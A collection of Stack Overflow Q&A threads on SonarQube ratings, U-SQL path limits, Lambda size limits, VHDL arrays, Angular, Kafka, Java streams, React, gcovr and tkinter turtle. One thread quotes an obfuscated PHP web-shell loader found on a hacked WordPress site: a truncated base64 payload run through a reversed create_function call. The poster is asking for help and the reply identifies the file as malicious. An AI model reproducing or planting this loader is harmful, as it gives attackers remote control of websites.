A: Documented? Why, yes. Yes they are: https://docs.sonarqube.org/latest/user-guide/metric-definitions/
Specifically, Security and Reliability ratings are based on the severity of the worst open issue in that domain:
*
*E - Blocker
*D - Critical
*C - Major
*B - Minor
*A - Info or no open issues
For Maintainability the rating is based on the ratio of the size of the code base to the estimated time to fix all open Maintainability issues:
*
*<=5% of the time that has already gone into the application, the rating is A
*between 6 to 10% the rating is a B
*between 11 to 20% the rating is a C
*between 21 to 50% the rating is a D
*anything over 50% is an E
The size of the code base is calculated by the number of lines where
The value of the cost to develop a line of code is 0.06 days.
A: The rating for Maintanability is calculated by the ratio of codebase size and time estimated to fix these issues.
The thresholds are configurable under General Settings -> Technical Debt -> Maintainability Rating Grid (Default: 0.05,0.1,0.2,0.5)
| stackoverflow | {
"language": "en",
"length": 231,
"provenance": "stackexchange_0000F.jsonl.gz:900195",
"question_score": "15",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652526"
} |
eb643c3c018feae8aa97303b4b7a4168e19f7f88 | Stackoverflow Stackexchange
Q: USQL Job failing due to exceeding the path length limit I am running my jobs locally using the Local SDK. However, I get the following error message:
Error : 'System.IO.PathTooLongException: The specified path, file name, or both are too long. The fully qualified file name must be less than 260 characters, and the directory name must be less than 248 characters.
One of my colleagues was able to track down the error to the .ss file in the catalog folder inside DataRoot by running the project in a new directory in C:\. The path for the .ss file is
C:\HelloWorld\Main\Source\Data\Insights\NewProject\NewProject\USQLJobsForTesting.Tests\bin\Debug\DataRoot\_catalog_\database\d92bfaa5-dc7f-4131-abdc-22c50eb0d8c0\schema\f6cf4417-e2d8-4769-b633-4fb5dddcb066\table\aa136daf-9e86-4650-9cc3-119d607fb3b0\31a18033-099e-4c2a-aae3-75cf099b0fb1.ss
which exceeds the allowed limit of 260 characters. I cannot reduce the length of my project path because my organization follows a certain working directory format.
Is there any possible solution for this problem?
A: Try using subst in CMD to workaround this problem by mapping a drive letter to the data root you want to use.
subst X: C:\PathToYourDataRoot
And then in ADL Tools for Visual Studio set the DataRoot to X:
| Q: USQL Job failing due to exceeding the path length limit I am running my jobs locally using the Local SDK. However, I get the following error message:
Error : 'System.IO.PathTooLongException: The specified path, file name, or both are too long. The fully qualified file name must be less than 260 characters, and the directory name must be less than 248 characters.
One of my colleagues was able to track down the error to the .ss file in the catalog folder inside DataRoot by running the project in a new directory in C:\. The path for the .ss file is
C:\HelloWorld\Main\Source\Data\Insights\NewProject\NewProject\USQLJobsForTesting.Tests\bin\Debug\DataRoot\_catalog_\database\d92bfaa5-dc7f-4131-abdc-22c50eb0d8c0\schema\f6cf4417-e2d8-4769-b633-4fb5dddcb066\table\aa136daf-9e86-4650-9cc3-119d607fb3b0\31a18033-099e-4c2a-aae3-75cf099b0fb1.ss
which exceeds the allowed limit of 260 characters. I cannot reduce the length of my project path because my organization follows a certain working directory format.
Is there any possible solution for this problem?
A: Try using subst in CMD to workaround this problem by mapping a drive letter to the data root you want to use.
subst X: C:\PathToYourDataRoot
And then in ADL Tools for Visual Studio set the DataRoot to X:
| stackoverflow | {
"language": "en",
"length": 174,
"provenance": "stackexchange_0000F.jsonl.gz:900220",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652608"
} |
8cc1f2aaef460785506c6ee1308d4d71cee2532f | Stackoverflow Stackexchange
Q: corrupted / hacked common.php file? I am having issues with one of my wordpress sites. (constantly login out users and not letting people log in)
My hosting think the route is the common.php files (/public_html/wp-content/common.php )
Can anyone shed any light on what the files is actually doing? Can I just delete it and will WordPress generate a new file?
common.php code:
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
*I've had to cut out a lot of the code here as it was over the character limit (abot 90,000!!)
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
Thanks in advance
Rich
A: Delete the file.
It is not a part of the WordPress install or uprade package. I would assume that the file is malicious and that your hosting account/personal machine/login credentials have been compromised or something like that.
This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked Then once your site is clean:
http://codex.wordpress.org/Hardening_WordPress
| Q: corrupted / hacked common.php file? I am having issues with one of my wordpress sites. (constantly login out users and not letting people log in)
My hosting think the route is the common.php files (/public_html/wp-content/common.php )
Can anyone shed any light on what the files is actually doing? Can I just delete it and will WordPress generate a new file?
common.php code:
<?php
$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
*I've had to cut out a lot of the code here as it was over the character limit (abot 90,000!!)
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
$array_name = "";
foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
$array_name .= $alphabet[$t];
}
$a = strrev("noi"."tcnuf"."_eta"."erc");
$f = $a("", $array_name($string));
$f();
Thanks in advance
Rich
A: Delete the file.
It is not a part of the WordPress install or uprade package. I would assume that the file is malicious and that your hosting account/personal machine/login credentials have been compromised or something like that.
This is the standard support doc referred to in this case: https://codex.wordpress.org/FAQ_My_site_was_hacked Then once your site is clean:
http://codex.wordpress.org/Hardening_WordPress
| stackoverflow | {
"language": "en",
"length": 170,
"provenance": "stackexchange_0000F.jsonl.gz:900238",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652663"
} |
dedcf1d114686a33e871235e62ccb58381a4f47b | Stackoverflow Stackexchange
Q: Loading large python packages into AWS lambda function I can't seem to get around this(below mentioned) error while trying to upload a function onto AWS lambda:
The Code tab failed to save. Reason: Unzipped size must be smaller than 262144000 bytes
I've zipped the function and all of it's dependencies and uploaded the zipped file to S3, and pasted the file's S3 URL at the lambda's prompt (upload a file from Amazon S3).
Any leads would be appreciated. Thanks
A: Adding to Entropic's answer, what about using something like pyminifier? This could be a very simple solution if the minification it performs is sufficient to reach the limit of 250 MB.
Also, if you are using the AWS SDK, you do not need to include it in your package as it is included in the Lambda execution environment. This could also save some space if it is the case.
| Q: Loading large python packages into AWS lambda function I can't seem to get around this(below mentioned) error while trying to upload a function onto AWS lambda:
The Code tab failed to save. Reason: Unzipped size must be smaller than 262144000 bytes
I've zipped the function and all of it's dependencies and uploaded the zipped file to S3, and pasted the file's S3 URL at the lambda's prompt (upload a file from Amazon S3).
Any leads would be appreciated. Thanks
A: Adding to Entropic's answer, what about using something like pyminifier? This could be a very simple solution if the minification it performs is sufficient to reach the limit of 250 MB.
Also, if you are using the AWS SDK, you do not need to include it in your package as it is included in the Lambda execution environment. This could also save some space if it is the case.
A: As kosa mentioned there is a hard limit at 250MB. This reddit thread had a few good ideas:
https://www.reddit.com/r/aws/comments/4qrw9m/how_to_work_around_aws_lambdas_250mb_limit/
Most solutions along the lines of 1) Loading more code later, thus getting around the 250 limit 2) Split up the code into smaller pieces, which is more aws-lambda-ish anyway, and 3) use strip command like this guy: https://serverlesscode.com/post/scikitlearn-with-amazon-linux-container/
2 is probably the best way to go, if you can split it up.
| stackoverflow | {
"language": "en",
"length": 223,
"provenance": "stackexchange_0000F.jsonl.gz:900251",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652729"
} |
8d7efc1085e2eb6a19350d5e51d585569980ecbd | Stackoverflow Stackexchange
Q: VHDL 2D Array Initialization using single Index type kelvin_Array is array(0 to 3, 0 to 1) of integer
signal array_int1 :kelvin_Array;
signal array_int2 :kelvin_Array;
begin
array_int1 (0,0) <= 5; --using 2 indexes
what I wanted is
array_int1(0) <= (5,3);
Please let me know how can I achieve this.
Regards,
Kelvin
A: It looks like you want a single dimensional array of a single dimensional array of two integers, eg:
type matthew_Array is array(0 to 1) of integer;
type matthew_Array_Array is array(0 to 9) of matthew_Array;
signal array_int1 : matthew_Array_Array;
begin
array_int1(0) <= (5,3);
https://www.edaplayground.com/x/5Lz8
| Q: VHDL 2D Array Initialization using single Index type kelvin_Array is array(0 to 3, 0 to 1) of integer
signal array_int1 :kelvin_Array;
signal array_int2 :kelvin_Array;
begin
array_int1 (0,0) <= 5; --using 2 indexes
what I wanted is
array_int1(0) <= (5,3);
Please let me know how can I achieve this.
Regards,
Kelvin
A: It looks like you want a single dimensional array of a single dimensional array of two integers, eg:
type matthew_Array is array(0 to 1) of integer;
type matthew_Array_Array is array(0 to 9) of matthew_Array;
signal array_int1 : matthew_Array_Array;
begin
array_int1(0) <= (5,3);
https://www.edaplayground.com/x/5Lz8
| stackoverflow | {
"language": "en",
"length": 95,
"provenance": "stackexchange_0000F.jsonl.gz:900271",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652782"
} |
916c526b1b1bc8fabf5089db9e549bbafa4fec2a | Stackoverflow Stackexchange
Q: reset or reload the same page in Angular 2 I am trying to reload the same url in Angular 2 by using router.navigate but it is not working.
Url: http://localhost:3000/page1
Scenario: I am on http://localhost:3000/landing and on click of button, will pass routing parameter which should reload the page.
Example:
Suppose user is in page1(Edit form) and url reads as localhost:3000/page1 and there will be a button Create new, on click of button passing a routing paramter using
let navigationExtras: NavigationExtras = { queryParams: { "refresh": "Y" } };
this.router.navigate(['page1'], navigationExtras);
A: ngOnInit is only called when the component is created. When you navigate to the same page (with different url parameters) the ngOnInit method is not recalled. You should use the ActivatedRoute Params Observable
import { ActivatedRoute } from '@angular/router';
export class MyComponent implements OnInit {
constructor(private _activatedRoute: ActivatedRoute){}
ngOnInit(){
this._activatedRoute.params.subscribe(
params => {
// this is called everytime the url changes
}
}
}
| Q: reset or reload the same page in Angular 2 I am trying to reload the same url in Angular 2 by using router.navigate but it is not working.
Url: http://localhost:3000/page1
Scenario: I am on http://localhost:3000/landing and on click of button, will pass routing parameter which should reload the page.
Example:
Suppose user is in page1(Edit form) and url reads as localhost:3000/page1 and there will be a button Create new, on click of button passing a routing paramter using
let navigationExtras: NavigationExtras = { queryParams: { "refresh": "Y" } };
this.router.navigate(['page1'], navigationExtras);
A: ngOnInit is only called when the component is created. When you navigate to the same page (with different url parameters) the ngOnInit method is not recalled. You should use the ActivatedRoute Params Observable
import { ActivatedRoute } from '@angular/router';
export class MyComponent implements OnInit {
constructor(private _activatedRoute: ActivatedRoute){}
ngOnInit(){
this._activatedRoute.params.subscribe(
params => {
// this is called everytime the url changes
}
}
}
A: You just need to call window.location.reload();
| stackoverflow | {
"language": "en",
"length": 164,
"provenance": "stackexchange_0000F.jsonl.gz:900274",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652789"
} |
2e170d20195da81d563868565287e5b010547e80 | Stackoverflow Stackexchange
Q: Connect JMS client to Apache Kafka I have a 3rd party system pumping data into HornetQ using JMS. I need to replace HornetQ by Kafka but I cannot change the 3rd party system. What is the correct way to get the data into kafka.
I googled around and found JMS-Client and kafka connect. After reading both documentation I'm confused and not sure which one is the right one.
Has anyone any experience with this and can give me some hints on how to do this?
A: The right way is to use the JMS-Client because it's an implementation of the JMS API specification but with the Kafka wire-protocol. It means that you can use this client in your 3rd party system and using Kafka instead of HornetQ on the other side. It means that at least you need to add this dependency to the 3rd party system in order to use this JMS implementation for Kafka instead of the HornetQ one.
| Q: Connect JMS client to Apache Kafka I have a 3rd party system pumping data into HornetQ using JMS. I need to replace HornetQ by Kafka but I cannot change the 3rd party system. What is the correct way to get the data into kafka.
I googled around and found JMS-Client and kafka connect. After reading both documentation I'm confused and not sure which one is the right one.
Has anyone any experience with this and can give me some hints on how to do this?
A: The right way is to use the JMS-Client because it's an implementation of the JMS API specification but with the Kafka wire-protocol. It means that you can use this client in your 3rd party system and using Kafka instead of HornetQ on the other side. It means that at least you need to add this dependency to the 3rd party system in order to use this JMS implementation for Kafka instead of the HornetQ one.
A: Use the Kafka JMS Client when you want to replace a JMS Broker with Apache Kafka
Use the Kafka JMS Connector when you want to integrate Kafka with a legacy JMS broker and send messages between the two different systems.
| stackoverflow | {
"language": "en",
"length": 203,
"provenance": "stackexchange_0000F.jsonl.gz:900312",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44652907"
} |
6313342958c263f9231b33ca501b2c1da4de8bf7 | Stackoverflow Stackexchange
Q: Bitbucket Pipeline INSTALL_PARSE_FAILED_NO_CERTIFICATES Issue
I generated the build(apk) using bitbucket pipeline with the help of the link
While trying to run the apk I am getting this issue
INSTALL_PARSE_FAILED_NO_CERTIFICATES. I didn't find the solution how to include default keystore file details to bitbucket.
A:
Fixed this issue by doing some changes in build.sh file.
#!/bin/bash
./gradlew $1:assembleDebug || exit 1
BRANCH_NAME=$2
mkdir -p ~/.ssh
(umask 077 ; echo $BUILD_KEY | base64 --decode > ~/.ssh/id_rsa)
chmod 600 ~/.ssh/id_rsa
TOSEND=$BITBUCKET_COMMIT
if [ "$3" == "true" ]
then
if [ "$1" == "venkat" ]
then
ssh -i ~/.ssh/id_rsa [email protected] mkdir -p build/androidsdk/${BRANCH_NAME}/$TOSEND
scp -i ~/.ssh/id_rsa venkat/build/outputs/aar/venkat-debug.aar [email protected]:build/androidsdk/${BRANCH_NAME}/$TOSEND || exit 1
fi
if [ "$1" == "app" ]
then
ssh -i ~/.ssh/id_rsa [email protected] mkdir -p build/androidtestapp/${BITBUCKET_BRANCH}/$TOSEND
scp -i ~/.ssh/id_rsa app/build/outputs/apk/app-debug.apk [email protected]:build/androidtestapp/${BITBUCKET_BRANCH}/$TOSEND || exit 1
fi
fi
now build is successfully generated and able to install in devices.
| Q: Bitbucket Pipeline INSTALL_PARSE_FAILED_NO_CERTIFICATES Issue
I generated the build(apk) using bitbucket pipeline with the help of the link
While trying to run the apk I am getting this issue
INSTALL_PARSE_FAILED_NO_CERTIFICATES. I didn't find the solution how to include default keystore file details to bitbucket.
A:
Fixed this issue by doing some changes in build.sh file.
#!/bin/bash
./gradlew $1:assembleDebug || exit 1
BRANCH_NAME=$2
mkdir -p ~/.ssh
(umask 077 ; echo $BUILD_KEY | base64 --decode > ~/.ssh/id_rsa)
chmod 600 ~/.ssh/id_rsa
TOSEND=$BITBUCKET_COMMIT
if [ "$3" == "true" ]
then
if [ "$1" == "venkat" ]
then
ssh -i ~/.ssh/id_rsa [email protected] mkdir -p build/androidsdk/${BRANCH_NAME}/$TOSEND
scp -i ~/.ssh/id_rsa venkat/build/outputs/aar/venkat-debug.aar [email protected]:build/androidsdk/${BRANCH_NAME}/$TOSEND || exit 1
fi
if [ "$1" == "app" ]
then
ssh -i ~/.ssh/id_rsa [email protected] mkdir -p build/androidtestapp/${BITBUCKET_BRANCH}/$TOSEND
scp -i ~/.ssh/id_rsa app/build/outputs/apk/app-debug.apk [email protected]:build/androidtestapp/${BITBUCKET_BRANCH}/$TOSEND || exit 1
fi
fi
now build is successfully generated and able to install in devices.
| stackoverflow | {
"language": "en",
"length": 144,
"provenance": "stackexchange_0000F.jsonl.gz:900377",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653139"
} |
f3f83a6564c042117beb2a770ce24a5c57e47cb5 | Stackoverflow Stackexchange
Q: Are there examples of using reinforcement learning for text classification? Imagine a binary classification problem like sentiment analysis. Since we have the labels, cant we use the gap between actual - predicted as reward for RL ?
I wish to try Reinforcement Learning for Classification Problems
A: Interesting thought! According to my knowledge it can be done.
*
*Imitation Learning - On a high level it is observing sample trajectories performed by the agent in the environment and use it to predict the policy given a particular stat configuration. I prefer Probabilistic Graphical Models for the prediction since I have more interpretability in the model. I have implemented a similar algorithm from the research paper: http://homes.soic.indiana.edu/natarasr/Papers/ijcai11_imitation_learning.pdf
*Inverse Reinforcement Learning - Again a similar method developed by Andrew Ng from Stanford to find the reward function from sample trajectories, and the reward function can be used to frame the desirable actions.
http://ai.stanford.edu/~ang/papers/icml00-irl.pdf
| Q: Are there examples of using reinforcement learning for text classification? Imagine a binary classification problem like sentiment analysis. Since we have the labels, cant we use the gap between actual - predicted as reward for RL ?
I wish to try Reinforcement Learning for Classification Problems
A: Interesting thought! According to my knowledge it can be done.
*
*Imitation Learning - On a high level it is observing sample trajectories performed by the agent in the environment and use it to predict the policy given a particular stat configuration. I prefer Probabilistic Graphical Models for the prediction since I have more interpretability in the model. I have implemented a similar algorithm from the research paper: http://homes.soic.indiana.edu/natarasr/Papers/ijcai11_imitation_learning.pdf
*Inverse Reinforcement Learning - Again a similar method developed by Andrew Ng from Stanford to find the reward function from sample trajectories, and the reward function can be used to frame the desirable actions.
http://ai.stanford.edu/~ang/papers/icml00-irl.pdf
| stackoverflow | {
"language": "en",
"length": 152,
"provenance": "stackexchange_0000F.jsonl.gz:900390",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653180"
} |
b272a68762b94a3cc80503deb65968360382e422 | Stackoverflow Stackexchange
Q: How to zip multiple lists using java 8? Given :
List<Integer> a = Arrays.asList(1,2,3);
List<Integer> b = Arrays.asList(1,2,3);
List<Integer> c = Arrays.asList(1,2,3);
List<Integer> d = Arrays.asList(1,2,3);
List<List<Integer>> sample = Arrays.asList(a,b,c,d);
How can I get this result with java 8?
[(1,1,1,1),(2,2,2,2),(3,3,3,3)]
A: /**
* Zips lists. E.g. given [[1,2,3],[4,5,6]], returns [[1,4],[2,5],[3,6]].
* @param listOfLists an N x M list
* @returns an M x N list
*/
static <T> List<List<T>> zip(List<List<T>> listOfLists) {
int size = listOfLists.get(0).size();
List<List<T>> result = new ArrayList<>(size);
for (int i = 0; i < size; ++i)
result.add(
listOfLists.stream()
.map(list -> list.get(i))
.collect(toList()));
return result;
}
| Q: How to zip multiple lists using java 8? Given :
List<Integer> a = Arrays.asList(1,2,3);
List<Integer> b = Arrays.asList(1,2,3);
List<Integer> c = Arrays.asList(1,2,3);
List<Integer> d = Arrays.asList(1,2,3);
List<List<Integer>> sample = Arrays.asList(a,b,c,d);
How can I get this result with java 8?
[(1,1,1,1),(2,2,2,2),(3,3,3,3)]
A: /**
* Zips lists. E.g. given [[1,2,3],[4,5,6]], returns [[1,4],[2,5],[3,6]].
* @param listOfLists an N x M list
* @returns an M x N list
*/
static <T> List<List<T>> zip(List<List<T>> listOfLists) {
int size = listOfLists.get(0).size();
List<List<T>> result = new ArrayList<>(size);
for (int i = 0; i < size; ++i)
result.add(
listOfLists.stream()
.map(list -> list.get(i))
.collect(toList()));
return result;
}
A: Java streams don't natively support zipping.
If you want to do it manually, then using an IntStream as an 'iterator' over the lists is the way to go:
List<Integer> l1 = Arrays.asList(1, 2, 3);
List<Integer> l2 = Arrays.asList(2, 3, 4);
List<Object[]> zipped = IntStream.range(0, 3).mapToObj(i -> new Object[]{l1.get(i), l2.get(i)}).collect(Collectors.toList());
zipped.stream().forEach(i -> System.out.println(i[0] + " " + i[1]));
This is ugly, however, and not the 'java' way (as in using an array of 'properties' instead of a class).
A: If we consider that all the Lists have the same size, so why Java 8? you can just use a simple loop like this :
List<List<Integer>> list = new ArrayList<>();
for(int i = 0; i<a.size(); i++){
list.add(Arrays.asList(a.get(i), b.get(i), c.get(i), d.get(i)));
}
Output
[[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]
I really insist to read this post here Is using Lambda expressions whenever possible in java good practice?
A: If i right understand your question you need something like that:
private <T> List<List<T>> zip(Stream<Iterable<T>> stream) {
return stream.collect(LinkedList::new,
(lists, ts) -> {
if (lists.isEmpty()) {
ts.forEach(t -> lists.add(new LinkedList<T>() {{
add(t);
}}));
} else {
Iterator<List<T>> listIterator = lists.iterator();
Iterator<T> elementIterator = ts.iterator();
while (listIterator.hasNext() && elementIterator.hasNext()) {
listIterator.next().add(elementIterator.next());
}
while (listIterator.hasNext()) {
listIterator.next();
listIterator.remove();
}
}
}, (lists, lists2) -> {
Iterator<List<T>> firstListIterator = lists.iterator();
Iterator<List<T>> secondListIterator = lists2.iterator();
while (firstListIterator.hasNext() && secondListIterator.hasNext()) {
firstListIterator.next().addAll(secondListIterator.next());
}
while (firstListIterator.hasNext()) {
firstListIterator.next();
firstListIterator.remove();
}
});
}
And you can get desired results with
System.out.println(zip(sample.stream()));
| stackoverflow | {
"language": "en",
"length": 346,
"provenance": "stackexchange_0000F.jsonl.gz:900471",
"question_score": "8",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653421"
} |
8d41bed6aac896eec60bb095294a022786497e5f | Stackoverflow Stackexchange
Q: c++ - protobuf vs rapidjson data format using rapidJSON I am able to store data of any type (supported by rapidJSON) as value against a key. Can I do that in protobuf? If so, how?
The reason I opted for protobuf over rapidJSON is because of its speed (and key comparison in rapidJSON is really a "string" comparison which is costly).
Or is there any alternative to that? maybe flatbuffers?
Requirement is storing data of any type against an int type key. Faster serialization/deserialization than regular json.
Looking for answers from C++ perspective.
A: In protobuf, typically you have a fixed contract that pre-interprets given keys as given types, but: there is also the concept of extensions. With an extension, arbitrary data can be stored against field-numbers; this works for any type that could also have been expressed using the regular API.
The convenience and performance of the extension API depends on the implementation, but it should be perfectly usable from the official C++ API.
The key point about extensions is that only the consumer needs to understand them.
| Q: c++ - protobuf vs rapidjson data format using rapidJSON I am able to store data of any type (supported by rapidJSON) as value against a key. Can I do that in protobuf? If so, how?
The reason I opted for protobuf over rapidJSON is because of its speed (and key comparison in rapidJSON is really a "string" comparison which is costly).
Or is there any alternative to that? maybe flatbuffers?
Requirement is storing data of any type against an int type key. Faster serialization/deserialization than regular json.
Looking for answers from C++ perspective.
A: In protobuf, typically you have a fixed contract that pre-interprets given keys as given types, but: there is also the concept of extensions. With an extension, arbitrary data can be stored against field-numbers; this works for any type that could also have been expressed using the regular API.
The convenience and performance of the extension API depends on the implementation, but it should be perfectly usable from the official C++ API.
The key point about extensions is that only the consumer needs to understand them.
A: Both Protobuf and FlatBuffer have a dictionary feature (see https://developers.google.com/protocol-buffers/docs/proto#maps and https://google.github.io/flatbuffers/md__cpp_usage.html under dictionaries). The big problem you may have with both however is not convenient to have the value be an arbitrary value, since both are defined by a schema, meaning you have to specify an actual type for the value. You can get around that by defining unions of all possible types, but it is never as convenient as JSON.
FlatBuffers however has a dedicated format for storing any value without a schema: https://google.github.io/flatbuffers/flexbuffers.html. This is a lot faster than JSON, more compact, and uses less extra memory to read (none).
FlatBuffers has the ability to use an int as key, but FlexBuffers doesn't yet, so you could consider storing a FlexBuffer as value inside a FlatBuffer int dictionary.
Both format parse from JSON and output to JSON, even when nested.
FlexBuffers can't be modified in-place. FlatBuffers can, using its object API. So again nesting could work well as long as you're ok re-generating the entire FlexBuffer value when it changes.
A final alternative worth mentioning is a std::map<int, std::vector<uint8_t>> (or unordered_map) to store a map of FlexBuffers directly. That is simpler, but now the problem you have is not having a convenient way to store the whole thing.
| stackoverflow | {
"language": "en",
"length": 392,
"provenance": "stackexchange_0000F.jsonl.gz:900474",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653430"
} |
cdb90028949cddeadafcd6338514b234333e11df | Stackoverflow Stackexchange
Q: Accessing React.DOM.input has been deprecated will be removed in v16.0+? A warning occured on my new React project
Accessing factories like React.DOM.input has been deprecated and will be removed in v16.0+. Use the react-dom-factories package instead. Version 1.0 provides a drop-in replacement. For more info, see.......
Anyone encountering same problem ? How to solve it ?
A: DOM.input is a factory, a function which returns a React Element (something that can be rendered by React). Either you're using this directly in your code, for example:
class MyInput extends Component {
render() {
return DOM.input(props, children);
}
}
or some library that you're using is doing so.
Instead of using DOM from the React package, you should install a separate package, react-dom-factories, and use DOM from there.
Alternatively, you can enable JSX and use <input> instead.
| Q: Accessing React.DOM.input has been deprecated will be removed in v16.0+? A warning occured on my new React project
Accessing factories like React.DOM.input has been deprecated and will be removed in v16.0+. Use the react-dom-factories package instead. Version 1.0 provides a drop-in replacement. For more info, see.......
Anyone encountering same problem ? How to solve it ?
A: DOM.input is a factory, a function which returns a React Element (something that can be rendered by React). Either you're using this directly in your code, for example:
class MyInput extends Component {
render() {
return DOM.input(props, children);
}
}
or some library that you're using is doing so.
Instead of using DOM from the React package, you should install a separate package, react-dom-factories, and use DOM from there.
Alternatively, you can enable JSX and use <input> instead.
| stackoverflow | {
"language": "en",
"length": 136,
"provenance": "stackexchange_0000F.jsonl.gz:900485",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653457"
} |
786d365d836263242b1d669a044a7ad3f69f4b49 | Stackoverflow Stackexchange
Q: Gcov report import in Sonarqube-5.6.6(LTS) using CXX Community Plug-in Our Sonar Build Environment details as follows:
SonarQube Server Version - 5.6.6 (64-Bit).
Sonar Client Build Operating System – Ubuntu 14.04.5 LTS (64-Bit).
Sonar-scanner- Version - 3.0.3.778.
sonar-cxx-plugin-0.9.7.jar
Source Code Language: C++
Description:-
I have .gcov coverage report. Want to know is it possible to import into Sonarqube dashboard using Cxx community plugin?
If so, kindly help me with the steps. Thanks in advance.
A: Use absolute filename path in gcovr report solved for me.
sonar config file: sonar-project.properties
sonar.projectKey=xxx
sonar.sources=src
sonar.host.url=http://xxx:xxx
sonar.login=xxx
sonar.language=c++
sonar.cxx.includeDirectories=xxx
sonar.exclusions=xxx
sonar.cxx.coverage.reportPath=gcovr_report.xml
sonar.cxx.coverage.itReportPath=gcovr_report.xml
sonar.cxx.coverage.overallReportPath=gcovr_report.xml
gcov temp file gcda/gcno in directory /xxx/src.
create gcovr xml report: gcovr -r /xxx/src --xml-pretty > gcovr_report.xml
replace filename tag in gcovr_report.xml with absolute path.
run sonar runner: ~/sonar-scanner-3.0.3.778-linux/bin/sonar-scanner -X
| Q: Gcov report import in Sonarqube-5.6.6(LTS) using CXX Community Plug-in Our Sonar Build Environment details as follows:
SonarQube Server Version - 5.6.6 (64-Bit).
Sonar Client Build Operating System – Ubuntu 14.04.5 LTS (64-Bit).
Sonar-scanner- Version - 3.0.3.778.
sonar-cxx-plugin-0.9.7.jar
Source Code Language: C++
Description:-
I have .gcov coverage report. Want to know is it possible to import into Sonarqube dashboard using Cxx community plugin?
If so, kindly help me with the steps. Thanks in advance.
A: Use absolute filename path in gcovr report solved for me.
sonar config file: sonar-project.properties
sonar.projectKey=xxx
sonar.sources=src
sonar.host.url=http://xxx:xxx
sonar.login=xxx
sonar.language=c++
sonar.cxx.includeDirectories=xxx
sonar.exclusions=xxx
sonar.cxx.coverage.reportPath=gcovr_report.xml
sonar.cxx.coverage.itReportPath=gcovr_report.xml
sonar.cxx.coverage.overallReportPath=gcovr_report.xml
gcov temp file gcda/gcno in directory /xxx/src.
create gcovr xml report: gcovr -r /xxx/src --xml-pretty > gcovr_report.xml
replace filename tag in gcovr_report.xml with absolute path.
run sonar runner: ~/sonar-scanner-3.0.3.778-linux/bin/sonar-scanner -X
| stackoverflow | {
"language": "en",
"length": 129,
"provenance": "stackexchange_0000F.jsonl.gz:900486",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44653458"
} |
fb6e4049e4ddf27873cae567db536ec7ba2a99c6 | Stackoverflow Stackexchange
Q: Integrate turtle module with tkinter canvas I am trying to integrate the Turtle module into an interface I have created with TKInter, currently I have a canvas where I would like for the turtle to draw to (see example 1). However I am lost in how to get the draw to it.
A: Try this:
import turtle
import tkinter as tk
def forward():
t.forward(100)
def back():
t.back(100)
def left():
t.left(90)
def right():
t.right(90)
root = tk.Tk()
canvas = tk.Canvas(master = root, width = 500, height = 500)
canvas.pack()
t = turtle.RawTurtle(canvas)
t.pencolor("#ff0000") # Red
t.penup() # Regarding one of the comments
t.pendown() # Regarding one of the comments
tk.Button(master = root, text = "Forward", command = forward).pack(side = tk.LEFT)
